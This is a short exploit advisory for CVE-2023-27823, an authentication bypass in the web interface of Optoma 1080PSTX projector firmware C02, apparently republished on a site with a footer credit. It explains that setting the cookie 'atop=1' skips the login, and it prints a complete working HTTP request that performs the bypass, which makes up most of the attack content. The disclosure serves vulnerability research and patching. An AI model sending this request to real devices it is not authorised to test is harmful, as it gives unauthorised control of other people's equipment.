# Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass # Date: 2023/05/09 # Exploit Author: Anthony Cole # Contact: http://twitter.com/acole76 # Website: http://twitter.com/acole76 # Vendor Homepage: http://optoma.com # Version: Optoma 1080PSTX Firmware C02 # Tested on: N/A # CVE : CVE-2023-27823 Details By default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1". GET /index.asp HTTP/1.1 Host: projector Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: atop=1 Connection: close
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
